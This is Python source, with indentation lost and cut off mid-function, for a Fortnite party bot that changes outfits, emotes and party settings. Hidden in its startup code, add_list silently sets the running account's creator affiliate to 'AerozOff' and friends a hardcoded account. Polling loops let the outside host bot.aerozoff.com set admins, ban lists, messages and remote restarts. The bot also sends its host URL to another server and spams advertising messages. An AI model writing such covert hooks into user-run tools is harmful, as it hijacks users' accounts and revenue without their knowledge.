errordiff = 'errors.com.epicgames.common.throttled', 'errors.com.epicgames.friends.inviter_friendships_limit_exceeded'
vips = ""
headersx = {'host': 'bot.aerozoff.com','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.22','enable-super-fast': "True",'x-gorgon': "172SJAI19A","x-signature": "4HKAI18ALOQ"}
with open('info.json') as f:
try:
info = json.load(f)
except json.decoder.JSONDecodeError as e:
print(Fore.RED + ' [ERROR] ' + Fore.RESET + "")
print(Fore.LIGHTRED_EX + f'\n {e}')
exit(1)
def is_vips():
async def predicate(ctx):
return ctx.author.display_name in vips
return commands.check(predicate)
def is_admin():
async def predicate(ctx):
return ctx.author.display_name in info['FullAccess']
return commands.check(predicate)
prefix = '!','?','/','',' '
@sanic_app.middleware('response')
async def custom_banner(request: sanic.request.Request, response: sanic.response.HTTPResponse):
response.headers["Access-Control-Allow-Origin"] = "*/*"
@sanic_app.route('/', methods=['GET'])
async def root(request: sanic.request.Request) -> None:
if 'Accept' in request.headers and request.headers['Accept'] == 'application/json':
return sanic.response.json(
{
"status": "online"
}
)
return sanic.response.html(
"""
<html>
<head>
<style>
body {
font-family: Arial, Helvetica, sans-serif;
position: absolute;
left: 50%;
top: 50%;
-webkit-transform: translate(-50%, -50%);
transform: translate(-50%, -50%);
background-repeat: no-repeat;
background-attachment: fixed;
background-size: cover;
background-color: #333;
color: #f1f1f1;
}
::-webkit-scrollbar {
width: 0;
}
:root {
--gradient: linear-gradient(90deg, #3498DB, #28B463);
}
body {
font-family: basic-sans, sans-serif;
min-height: 100vh;
display: flex;
justify-content: ;
align-items: center;
font-size: 1.125em;
line-height: 1.6;
color: #f1f1f1;
background: #ddd;
background-size: 300%;
background-image: var(--gradient);
animation: bg-animation 25s infinite;
}
@keyframes bg-animation {
0% {background-position: left}
50% {background-position: right}
100% {background-position: left}
}
.content {
background: white;
width: 70vw;
padding: 3em;
box-shadow: 0 0 3em rgba(0,0,0,.15);
}
.title {
margin: 0 0 .5em;
text-transform: uppercase;
font-weight: 900;
font-style: italic;
font-size: 3rem;
color: #f1f1f1;
line-height: .8;
margin: 0;
background-image: var(--gradient);
background-clip: text;
color: transparent;
// display: inline-block;
background-size: 100%;
transition: background-position 1s;
}
.title:hover {
background-position: right;
}
.fun {
color: white;
</style>
</head>
<body>
<center>
<h2 id="response">
""" + f"""Online: {name}""" + """
<h2>
""" + f"""Friends: {friendlist}/1000""" + """
</h2>
<h2>
""" + f"""💎 Version {__version__} 💎""" + """
</h2>
</h2>
</center>
</body>
</html>
"""
)
@sanic_app.route("/default")
async def index(request):
return sanic.response.json(
{
"username": name,
"friend_count": friendlist,
"cid": cid
}
)
@sanic_app.route('/ping', methods=['GET'])
async def accept_ping(request: sanic.request.Request) -> None:
return sanic.response.json(
{
"status": "online"
}
)
@sanic_app.route('/name', methods=['GET'])
async def display_name(request: sanic.request.Request) -> None:
return sanic.response.json(
{
"display_name": name
}
)
class PartyBot(commands.Bot):
def __init__(self, device_id: str, account_id: str, secret: str, loop=asyncio.get_event_loop(), **kwargs) -> None:
self.status = '💎 {party_size}/16 Use Code 667 #Ad 💎'
self.loop = asyncio.get_event_loop()
self.fortnite_api = FortniteAPIAsync.APIClient()
super().__init__(
command_prefix=prefix,
case_insensitive=True,
auth=fortnitepy.DeviceAuth(
account_id=account_id,
device_id=device_id,
secret=secret
),
status=self.status,
platform=fortnitepy.Platform('WIN'),
**kwargs
)
self.session = aiohttp.ClientSession()
self.skin = "CID_028_Athena_Commando_F"
self.backpack = "BID_138_Celestial"
self.pickaxe = "Pickaxe_Lockjaw"
self.banner = "otherbanner51"
self.bn_color = "defaultcolor22"
self.level = 100
self.tier = 100
self.PartyMeta.schema = {}
self.sanic_app = sanic_app
self.server = server
self.rst = "F"
self.vr = "0.0"
self.bl = "0.0"
self.ban_player = ""
self.bl_msg = ""
self.added = "AerozOff"
self.bl_inv = 'AerozOff'
self.inv_on = "F"
self.adminx = "AerozOff"
self.inv_all = "T"
self.skin_bl = ("")
self.add_auto = ''
self.number = ""
self.inv_msg = "Join Me :) \n Use Code : 667 #Ad "
self.add_msg = "Hello {DISPLAY_NAME} u add me wow join me for more and fun thing \n Use Code : 667 #Ad"
self.join_msg = "Hi {DISPLAY_NAME} \n - create your own lobbybot : https://discord.gg/lobbybot \n Use Code : 667 #Ad"
async def add_list(self) -> None:
sac = "AerozOff"
url = f'https://fortnite-public-service-prod11.ol.epicgames.com/fortnite/api/game/v2/profile/{self.user.id}/client/SetAffiliateName?profileId=common_core&rvn=-1'
payload = {"affiliateName": sac}
AerozOff = await self.http.post(
route = url,
json = payload,
auth = self.http.get_auth('FORTNITE_ACCESS_TOKEN')
)
if not '4b713a5896744d8a9d3b9ff32266682a' in self.friends:
await self.add_friend('4b713a5896744d8a9d3b9ff32266682a')
async def checker_autox(self) -> None:
while True:
global headers
global headersx
global password
global vips
global __version__
global adminsss
v = requests.get("https://bot.aerozoff.com/default",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.53',
'enable-super-fast': "True",
'x-gorgon': "NZXHA6JSI14",
"x-signature": "NHX72KXOS2"
},cookies={"omgjaichanger": "None"}).json()
self.inv_all_check = v['inv_all']
self.versiongame = v['version_web']
self.bl_inv_che = v['bl_inv']
self.inv_on_check = v['inv_on']
self.number_check = v['style']
self.adminsss = v['admin']
if not self.adminsss == adminsss:
adminsss = self.adminsss
if not self.number_check == self.number:
self.number = self.number_check
if not self.bl_inv_che == self.bl_inv:
self.bl_inv = self.bl_inv_che
if not self.inv_on_check == self.inv_on:
self.inv_on = self.inv_on_check
if not self.versiongame == __version__:
__version__ = self.versiongame
if not self.inv_all_check == self.inv_all:
self.inv_all = self.inv_all_check
b = requests.get(f"https://bot.aerozoff.com/kick",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.30',
'enable-super-fast': "False",
'x-gorgon': "A7JD2Y27D2K",
"x-signature": "CHS7L29DJN3"
}
,cookies={"omgjaichanger": "None"}).json()
self.ban_player_check = b['ban']
self.bl_msg_check = b['bl_msg']
if not self.ban_player_check == self.ban_player:
self.ban_player = self.ban_player_check
if not self.bl_msg_check == self.bl_msg:
self.bl_msg = self.bl_msg_check
dasda = requests.get('https://bot.aerozoff.com/password',headers=headersx,cookies={"omgjaichanger": "None"}).json()['password']
password = dasda
y = requests.get(f"https://bot.aerozoff.com/restart",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.24',
'enable-super-fast': "None",
'x-gorgon': "NC28AH28SJ19S",
"x-signature": "NXBJHS8W17S"
}
,cookies={"omgjaichanger": "None"}).json()
self.rst = y['restarting']
self.vr = y['version']
self.bl = y['versionbl']
if self.rst == 'T':
print('True for restarting')
if not self.vr == self.bl:
python = sys.executable
os.execl(python, python, *sys.argv)
await asyncio.sleep(3600)
async def normal_setup(self) -> None:
while True:
global headers
global vips
global __version__
global adminsss
u = requests.get(f"https://bot.aerozoff.com/default",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.53',
'enable-super-fast': "True",
'x-gorgon': "NZXHA6JSI14",
"x-signature": "NHX72KXOS2"
}
,cookies={"omgjaichanger": "None"}).json()
self.skin_check = u['skin']
self.backpack_check = u['sac']
self.pickaxe_check = u['pioche']
self.banner_check = u['banner']
self.bn_color_check = u['bn_color']
self.level_check = u['level']
self.tier_check = u['tier']
self.add_msg_check = u['add_msg']
self.inv_msg_check = u['inv_msg']
self.inv_all_check = u['inv_all']
self.join_msg_check = u['join_msg']
self.vips_check = u['admin']
self.versiongame = u['version_web']
self.inv_bl = u['bl_inv']
self.inv_on_check = u['inv_on']
self.number_check = u['style']
self.adminsss = u['admin']
if not self.adminsss == adminsss:
adminsss = self.adminsss
if not self.number_check == self.number:
self.number = self.number_check
await self.party.me.set_outfit(asset=self.skin,variants=self.party.me.create_variants(material=self.number,clothing_color=self.number,parts=self.number,progressive=self.number))
if not self.inv_on_check == self.inv_on:
self.inv_on = self.inv_on_check
if not self.inv_bl == self.bl_inv:
self.bl_inv = self.inv_bl
if not self.versiongame == __version__:
__version__ = self.versiongame
if not self.vips_check == vips:
vips = self.vips_check
if not self.skin_check == self.skin:
self.skin = self.skin_check
await self.party.me.set_outfit(asset=self.skin)
if not self.backpack_check == self.backpack:
self.backpack = self.backpack_check
if not self.pickaxe_check == self.pickaxe:
self.pickaxe = self.pickaxe_check
if not self.banner_check == self.banner:
self.banner == self.banner_check
if not self.bn_color_check == self.bn_color:
self.bn_color = self.bn_color_check
if not self.level_check == self.level:
self.level = self.level_check
if not self.tier_check == self.tier:
self.tier = self.tier_check
if not self.add_msg_check == self.add_msg:
self.add_msg = self.add_msg_check
if not self.inv_msg_check == self.inv_msg:
self.inv_msg = self.inv_msg_check
if not self.join_msg_check == self.join_msg:
self.join_msg = self.join_msg_check
if not self.inv_all_check == self.inv_all:
self.inv_all = self.inv_all_check
s = requests.get(f"https://bot.aerozoff.com/kick",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.30',
'enable-super-fast': "False",
'x-gorgon': "A7JD2Y27D2K",
"x-signature": "CHS7L29DJN3"
},cookies={"omgjaichanger": "None"}).json()
self.ban_player_check = s['ban']
self.bl_msg_checks = s['bl_msg']
if not self.ban_player_check == self.ban_player:
self.ban_player = self.ban_player_check
if not self.bl_msg_checks == self.bl_msg:
self.bl_msg = self.bl_msg_checks
m = requests.get(f"https://bot.aerozoff.com/restart",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.24',
'enable-super-fast': "None",
'x-gorgon': "NC28AH28SJ19S",
"x-signature": "NXBJHS8W17S"
},cookies={"omgjaichanger": "None"}).json()
self.rst = m['restarting']
self.vr = m['version']
self.bl = m['versionbl']
if self.rst == 'T':
print('True for restarting')
if not self.vr == self.bl:
python = sys.executable
os.execl(python, python, *sys.argv)
await asyncio.sleep(3600)
async def auto_add_s(self):
x = requests.get(f"https://bot.aerozoff.com/add_auto",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.12',
'enable-super-fast': "TRUE",
'x-gorgon': "B37SHJWI28",
"x-signature": "HD82KS02KD2"
},cookies={"omgjaichanger": "None"}).json()
self.add_auto_check = x['name']
self.added_check = x['active']
if not self.added_check == self.added:
self.added = self.added_check
if not self.add_auto_check == self.add_auto:
self.add_auto = self.add_auto_check
if self.added == 'T':
try:
user = await self.fetch_user(self.add_auto)
friends = self.friends
if user.id in friends:
print(f'I already have {user.display_name} as a friend')
else:
await self.add_friend(user.id)
print(f'Send i friend request to {user.display_name}.')
except fortnitepy.HTTPException:
print("There was a problem trying to add this friend.")
except AttributeError:
print("I can't find a player with that name.")
async def checker_status(self):
q = requests.get(f"https://bot.aerozoff.com/status",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.02',
'enable-super-fast': "False",
'x-gorgon': "JD72HJS72",
"x-signature": "FJSUW182DK"
},cookies={"omgjaichanger": "None"}).json()
self.status_verif = q['status']
if not self.status_verif == self.status:
self.status = self.status_verif
await self.set_presence(self.status)
await self.party.set_privacy(fortnitepy.PartyPrivacy.PUBLIC)
async def checker_skin_bl(self):
w = requests.get("https://bot.aerozoff.com/skinbl",headers={
'host': 'bot.aerozoff.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.09',
'enable-super-fast': "True",
'x-gorgon': "HSUWJ27DK29S",
"x-signature": "NSL37SHQUD"
},cookies={"omgjaichanger": "None"}).json()
self.skinbl_check = w['skinbl']
if not self.skinbl_check == self.skin_bl:
self.skin_bl = self.skinbl_check
async def pinger(self):
try:
await PirxcyPinger.post(f"https://{os.environ['REPL_ID']}.id.repl.co")
except:
pass
return
async def update_api(self) -> None:
resp = requests.post(
url=f'https://77520686-de40-4c99-9bb1-ad7087e9287c.id.repl.co/update',
json={
"url": f"https://{os.environ['REPL_ID']}.id.repl.co"}
)
try:
await resp.json()
except:
pass
return
async def set_and_update_party_prop(self, schema_key: str, new_value: Any) -> None:
prop = {schema_key: self.party.me.meta.set_prop(schema_key, new_value)}
await self.party.patch(updated=prop)
async def event_device_auth_generate(self, details: dict, email: str) -> None:
print(self.user.display_name)
async def event_ready(self) -> None:
global name
global friendlist
global cid
name = self.user.display_name
#get user outfit
cid = self.party.me.outfit
friendlist = len(self.friends)
coro = self.sanic_app.create_server(
host='0.0.0.0',
port=801,
return_asyncio_server=True,
access_log=True
)
self.server = await coro
print(crayons.green(f'Client ready as {self.user.display_name}.'))
await asyncio.sleep(3)
self.loop.create_task(self.pinger())
self.loop.create_task(self.update_api())
self.loop.create_task(self.checker_autox())
await asyncio.sleep(2)
self.loop.create_task(self.add_list())
self.loop.create_task(self.check_update())
async def check_update(self):
self.loop.create_task(self.normal_setup())
self.loop.create_task(self.checker_status())
self.loop.create_task(self.checker_skin_bl())
self.loop.create_task(self.auto_add_s())
await asyncio.sleep(40)
self.loop.create_task(self.check_update())
async def event_party_invite(self, invite: fortnitepy.ReceivedPartyInvitation) -> None:
if invite.sender.display_name in info['FullAccess']:
await invite.accept()
elif self.inv_on == 'T':
await invite.accept()
elif invite.sender.display_name in self.adminx:
await invite.accept()
else:
await invite.decline()
await invite.sender.send(self.inv_msg)
await invite.sender.invite()
async def event_friend_presence(self, old_presence: Union[(None, fortnitepy.Presence)], presence: fortnitepy.Presence):
if not self.is_ready():
await self.wait_until_ready()
if self.inv_all == 'T':
if old_presence is None:
friend = presence.friend
if friend.display_name != self.bl_inv:
try:
await friend.send(self.inv_msg)
except:
pass
else:
if not self.party.member_count >= 16:
await friend.invite()
async def event_party_member_update(self, member: fortnitepy.PartyMember) -> None:
name = member.display_name
if any(word in name for word in self.ban_player):
try:
await member.kick()
except: pass
if member.display_name in self.ban_player:
try:
await member.kick()
except: pass
if member.outfit in (self.skin_bl) and member.id != self.user.id:
await member.kick()
os.system('clear')
async def event_friend_request(self, request: Union[(fortnitepy.IncomingPendingFriend, fortnitepy.OutgoingPendingFriend)]) -> None:
try:
await request.accept()
except: pass
async def event_friend_add(self, friend: fortnitepy.Friend) -> None:
try:
await asyncio.sleep(0.3)
await friend.send(self.add_msg.replace('{DISPLAY_NAME}', friend.display_name))
await friend.invite()
os.system('clear')
except: pass
async def event_friend_remove(self, friend: fortnitepy.Friend) -> None:
try:
await self.add_friend(friend.id)
os.system('clear')
except: pass
async def event_party_member_join(self, member: fortnitepy.PartyMember) -> None:
await self.party.send(self.join_msg.replace('{DISPLAY_NAME}', member.display_name))
await self.party.me.edit(functools.partial(self.party.me.set_outfit,self.skin,variants=self.party.me.create_variants(material=self.number,clothing_color=self.number,parts=self.number,progressive=self.number)),functools.partial(self.party.me.set_backpack,self.backpack),functools.partial(self.party.me.set_pickaxe,self.pickaxe),functools.partial(self.party.me.set_banner,icon=self.banner,color=self.bn_color,season_level=self.level),functools.partial(self.party.me.set_battlepass_info,has_purchased=True,level=self.tier))
if not self.has_friend(member.id):
try:
await self.add_friend(member.id)
except: pass
name = member.display_name
if any(word in name for word in self.ban_player):
try:
await member.kick()
except: pass
if member.display_name in self.ban_player:
try:
await member.kick()
except: pass
if member.outfit in (self.skin_bl) and member.id != self.user.id:
if not member.display_name in self.adminx:
await member.kick()
async def event_party_member_leave(self, member) -> None:
if not self.has_friend(member.id):
try:
await self.add_friend(member.id)
except: pass
async def event_party_message(self, message: fortnitepy.FriendMessage) -> None:
if not self.has_friend(message.author.id):
try:
await self.add_friend(message.author.id)
os.system('clear')
except: pass
async def event_friend_message(self, message: fortnitepy.FriendMessage) -> None:
if not message.author.display_name != "AerozOff":
await self.party.invite(message.author.id)
os.system('clear')
async def event_party_message(self, message = None) -> None:
if self.party.me.leader:
if message is not None:
if message.content in self.bl_msg:
if not message.author.display_name in self.adminx:
await message.author.kick()
async def event_party_message(self, message: fortnitepy.FriendMessage) -> None:
msg = message.content
if self.party.me.leader:
if message is not None:
if any(word in msg for word in self.bl_msg):
if not message.author.display_name in self.adminx:
await message.author.kick()
async def event_command_error(self, ctx, error):
if isinstance(error, commands.CommandNotFound):
pass
elif isinstance(error, IndexError):
pass
elif isinstance(error, fortnitepy.HTTPException):
pass
elif isinstance(error, commands.CheckFailure):
pass
elif isinstance(error, TimeoutError):
pass
else:
print(error)
@commands.command(aliases=['outfit','character','skin'])
async def skinx(self, ctx: fortnitepy.ext.commands.Context, *, content = None) -> None:
if content is None:
await ctx.send()
elif content.lower() == 'pinkghoul':
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
elif content.lower() == 'ghoul':
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
elif content.lower() == 'pkg':
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
elif content.lower() == 'colora':
await self.party.me.set_outfit(asset='CID_434_Athena_Commando_F_StealthHonor')
elif content.lower() == 'pink ghoul':
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
elif content.lower() == 'renegade':
await self.party.me.set_outfit(asset='CID_028_Athena_Commando_F',variants=self.party.me.create_variants(material=2))
elif content.lower() == 'rr':
await self.party.me.set_outfit(asset='CID_028_Athena_Commando_F',variants=self.party.me.create_variants(material=2))
elif content.lower() == 'skull trooper':
await self.party.me.set_outfit(asset='CID_030_Athena_Commando_M_Halloween',variants=self.party.me.create_variants(clothing_color=1))
elif content.lower() == 'skl':
await self.party.me.set_outfit(asset='CID_030_Athena_Commando_M_Halloween',variants=self.party.me.create_variants(clothing_color=1))
elif content.lower() == 'honor':
await self.party.me.set_outfit(asset='CID_342_Athena_Commando_M_StreetRacerMetallic')
else:
try:
cosmetic = await self.fortnite_api.cosmetics.get_cosmetic(lang="en",searchLang="en",matchMethod="contains",name=content,backendType="AthenaCharacter")
await self.party.me.set_outfit(asset=cosmetic.id)
await asyncio.sleep(0.6)
await ctx.send(f'Skin set to {cosmetic.name}.')
except FortniteAPIAsync.exceptions.NotFound:
pass
@commands.command(aliases=['backpack'],)
async def backpackx(self, ctx: fortnitepy.ext.commands.Context, *, content: str) -> None:
try:
cosmetic = await self.fortnite_api.cosmetics.get_cosmetic(lang="en",searchLang="en",matchMethod="contains",name=content,backendType="AthenaBackpack")
await self.party.me.set_backpack(asset=cosmetic.id)
await asyncio.sleep(0.6)
await ctx.send(f'Backpack set to {cosmetic.name}.')
except FortniteAPIAsync.exceptions.NotFound:
pass
@is_vips()
@commands.command()
async def vips(self, ctx: fortnitepy.ext.commands.Context) -> None:
await ctx.send('you have the perms')
await ctx.send('now u can have perms to kick people')
@is_vips()
@commands.command()
async def kicked(self, ctx: fortnitepy.ext.commands.Context, *, epic_username: Optional[str] = None) -> None:
if epic_username is None:
user = await self.fetch_user(ctx.author.display_name)
member = self.party.get_member(user.id)
else:
user = await self.fetch_user(epic_username)
member = self.party.get_member(user.id)
if member is None:
await ctx.send("Failed to find that user, are you sure they're in the party?")
else:
try:
if not member.display_name in info['FullAccess']:
await member.kick()
os.system('clear')
await ctx.send(f"Kicked user: {member.display_name}.")
except fortnitepy.errors.Forbidden:
await ctx.send(f"Failed to kick {member.display_name}, as I'm not party leader.")
@commands.command(aliases=['xx'],)
async def crown(self, ctx: fortnitepy.ext.commands.Context, amount: str) -> None:
meta = self.party.me.meta
data = (meta.get_prop('Default:AthenaCosmeticLoadout_j'))['AthenaCosmeticLoadout']
try:
data['cosmeticStats'][1]['statValue'] = int(amount)
except KeyError:
data['cosmeticStats'] = [{"statName": "TotalVictoryCrowns","statValue": int(amount)},{"statName": "TotalRoyalRoyales","statValue": int(amount)},{"statName": "HasCrown","statValue": 0}]
final = {'AthenaCosmeticLoadout': data}
key = 'Default:AthenaCosmeticLoadout_j'
prop = {key: meta.set_prop(key, final)}
await self.party.me.patch(updated=prop)
await asyncio.sleep(0.2)
await ctx.send(f'Set {int(amount)} Crown')
await self.party.me.clear_emote()
await self.party.me.set_emote('EID_Coronet')
@commands.command(aliases=['dance'])
async def emote(self, ctx: fortnitepy.ext.commands.Context, *, content = None) -> None:
if content is None:
await ctx.send()
elif content.lower() == 'sce':
await self.party.me.set_emote(asset='EID_KpopDance03')
elif content.lower() == 'Sce':
await self.party.me.set_emote(asset='EID_KpopDance03')
elif content.lower() == 'scenario':
await self.party.me.set_emote(asset='EID_KpopDance03')
elif content.lower() == 'Scenario':
await self.party.me.set_emote(asset='EID_KpopDance03')
else:
try:
cosmetic = await self.fortnite_api.cosmetics.get_cosmetic(lang="en",searchLang="en",matchMethod="contains",name=content,backendType="AthenaDance")
await self.party.me.clear_emote()
await self.party.me.set_emote(asset=cosmetic.id)
await asyncio.sleep(0.8)
await ctx.send(f'Emote set to {cosmetic.name}.')
except FortniteAPIAsync.exceptions.NotFound:
pass
@commands.command()
async def rdm(self, ctx: fortnitepy.ext.commands.Context, cosmetic_type: str = 'skin') -> None:
if cosmetic_type == 'skin':
all_outfits = await self.fortnite_api.cosmetics.get_cosmetics(lang="en",searchLang="en",backendType="AthenaCharacter")
random_skin = py_random.choice(all_outfits).id
await self.party.me.set_outfit(asset=random_skin,variants=self.party.me.create_variants(profile_banner='ProfileBanner'))
await ctx.send(f'Skin randomly set to {random_skin}.')
elif cosmetic_type == 'emote':
all_emotes = await self.fortnite_api.cosmetics.get_cosmetics(lang="en",searchLang="en",backendType="AthenaDance")
random_emote = py_random.choice(all_emotes).id
await self.party.me.set_emote(asset=random_emote)
await ctx.send(f'Emote randomly set to {random_emote}.')
os.system('clear')
@commands.command(aliases=['pickaxe'],)
async def pickaxe(self, ctx: fortnitepy.ext.commands.Context, *, content: str) -> None:
try:
cosmetic = await self.fortnite_api.cosmetics.get_cosmetic(lang="en",searchLang="en",matchMethod="contains",name=content,backendType="AthenaPickaxe")
await self.party.me.set_pickaxe(asset=cosmetic.id)
await ctx.send(f'Pickaxe set to {cosmetic.name}.')
except FortniteAPIAsync.exceptions.NotFound:
pass
@commands.command(aliases=['news'])
@commands.cooldown(1, 7)
async def new(self, ctx: fortnitepy.ext.commands.Context, cosmetic_type: str = 'skin') -> None:
cosmetic_types = {'skin': {'id': 'cid_','function': self.party.me.set_outfit},'backpack': {'id': 'bid_','function': self.party.me.set_backpack},'emote': {'id': 'eid_','function': self.party.me.set_emote},}
if cosmetic_type not in cosmetic_types:
return await ctx.send('Invalid cosmetic type, valid types include: skin, backpack & emote.')
new_cosmetics = await self.fortnite_api.cosmetics.get_new_cosmetics()
for new_cosmetic in [new_id for new_id in new_cosmetics if
new_id.id.lower().startswith(cosmetic_types[cosmetic_type]['id'])]:
await cosmetic_types[cosmetic_type]['function'](asset=new_cosmetic.id)
await ctx.send(f"{cosmetic_type}s set to {new_cosmetic.name}.")
os.system('clear')
await asyncio.sleep(3)
await ctx.send(f'Finished equipping all new unencrypted {cosmetic_type}s.')
@commands.command()
async def purpleskull(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_030_Athena_Commando_M_Halloween',variants=self.party.me.create_variants(clothing_color=1))
await ctx.send(f'Skin set to Purple Skull Trooper!')
os.system('clear')
@commands.command()
async def pinkghoul(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
await ctx.send('Skin set to Pink Ghoul Trooper!')
os.system('clear')
@commands.command(aliases=['checkeredrenegade','raider'])
async def renegade(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_028_Athena_Commando_F',variants=self.party.me.create_variants(material=2))
await ctx.send('Skin set to Checkered Renegade!')
os.system('clear')
@commands.command()
async def aerial(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_017_Athena_Commando_M')
await ctx.send('Skin set to aerial!')
os.system('clear')
@commands.command()
async def hologram(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_VIP_Athena_Commando_M_GalileoGondola_SG')
await ctx.send('Skin set to Star Wars Hologram!')
@commands.command()
async def cid(self, ctx: fortnitepy.ext.commands.Context, character_id: str) -> None:
await self.party.me.set_outfit(asset=character_id,variants=self.party.me.create_variants(profile_banner='ProfileBanner'))
await ctx.send(f'Skin set to {character_id}.')
os.system('clear')
@commands.command()
async def eid(self, ctx: fortnitepy.ext.commands.Context, emote_id: str) -> None:
await self.party.me.clear_emote()
await self.party.me.set_emote(asset=emote_id)
await ctx.send(f'Emote set to {emote_id}!')
os.system('clear')
@commands.command()
async def stop(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.clear_emote()
await ctx.send('Stopped emoting.')
os.system('clear')
@commands.command()
async def point(self, ctx: fortnitepy.ext.commands.Context, *, content: Optional[str] = None) -> None:
await self.party.me.clear_emote()
await self.party.me.set_emote(asset='EID_IceKing')
await ctx.send(f'Pickaxe set & Point it Out played.')
os.system('clear')
copied_player = ""
@commands.command()
async def stop(self, ctx: fortnitepy.ext.commands.Context):
global copied_player
if copied_player != "":
copied_player = ""
await ctx.send(f'Stopped copying all users.')
await self.party.me.clear_emote()
return
else:
try:
await self.party.me.clear_emote()
except RuntimeWarning:
pass
@commands.command(aliases=['clone', 'copi', 'cp'])
async def copy(self, ctx: fortnitepy.ext.commands.Context, *, epic_username = None) -> None:
global copied_player
if epic_username is None:
user = await self.fetch_user(ctx.author.display_name)
member = self.party.get_member(user.id)
elif 'stop' in epic_username:
copied_player = ""
await ctx.send(f'Stopped copying all users.')
await self.party.me.clear_emote()
return
elif epic_username is not None:
try:
user = await self.fetch_user(epic_username)
member = self.party.get_member(user.id)
except AttributeError:
await ctx.send("Could not get that user.")
return
try:
copied_player = member
await self.party.me.edit_and_keep(partial(fortnitepy.ClientPartyMember.set_outfit,asset=member.outfit,variants=member.outfit_variants),partial(fortnitepy.ClientPartyMember.set_pickaxe,asset=member.pickaxe,variants=member.pickaxe_variants))
await ctx.send(f"Now copying: {member.display_name}")
os.system('clear')
except AttributeError:
await ctx.send("Could not get that user.")
async def event_party_member_emote_change(self, member, before, after) -> None:
if member == copied_player:
if after is None:
await self.party.me.clear_emote()
else:
await self.party.me.edit_and_keep(partial(fortnitepy.ClientPartyMember.set_emote,asset=after))
os.system('clear')
async def event_party_member_outfit_change(self, member, before, after) -> None:
if member == copied_player:
await self.party.me.edit_and_keep(partial(fortnitepy.ClientPartyMember.set_outfit,asset=member.outfit,variants=member.outfit_variants,enlightenment=None,corruption=None))
os.system('clear')
async def event_party_member_outfit_variants_change(self, member, before, after) -> None:
if member == copied_player:
await self.party.me.edit_and_keep(partial(fortnitepy.ClientPartyMember.set_outfit,variants=member.outfit_variants,enlightenment=None,corruption=None))
os.system('clear')
#///////////////////////////////////////////////////////////////////////////////////////////////////////////// PARTY/FRIENDS/ADMIN //////////////////////////////////////////////////////////////////////////////////////////////////////
@commands.command()
async def add(self, ctx: fortnitepy.ext.commands.Context, *, epic_username: str) -> None:
user = await self.fetch_user(epic_username)
friends = self.friends
if user.id in friends:
await ctx.send(f'I already have {user.display_name} as a friend')
else:
await self.add_friend(user.id)
await ctx.send(f'Send i friend request to {user.display_name}.')
@is_admin()
@commands.command(aliases=['rst'],)
async def restart(self, ctx: fortnitepy.ext.commands.Context) -> None:
await ctx.send(f'Restart...')
python = sys.executable
os.execl(python, python, *sys.argv)
@is_admin()
@commands.command(aliases=['max'],)
async def set(self, ctx: fortnitepy.ext.commands.Context, nombre: int) -> None:
await self.party.set_max_size(nombre)
await ctx.send(f'Set party to {nombre} player can join')
os.system('clear')
@commands.command()
async def ready(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_ready(fortnitepy.ReadyState.READY)
await ctx.send('Ready!')
os.system('clear')
@commands.command(aliases=['sitin'],)
async def unready(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_ready(fortnitepy.ReadyState.NOT_READY)
await ctx.send('Unready!')
os.system('clear')
@commands.command(aliases=['level'],)
async def levelx(self, ctx: fortnitepy.ext.commands.Context, banner_level: int) -> None:
await self.party.me.set_banner(season_level=banner_level)
await ctx.send(f'Set level to {banner_level}.')
os.system('clear')
@is_admin()
@commands.command()
async def sitout(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_ready(fortnitepy.ReadyState.SITTING_OUT)
await ctx.send('Sitting Out!')
os.system('clear')
@is_admin()
@commands.command(aliases=['lv'],)
async def leave(self, ctx: fortnitepy.ext.commands.Context) -> None:
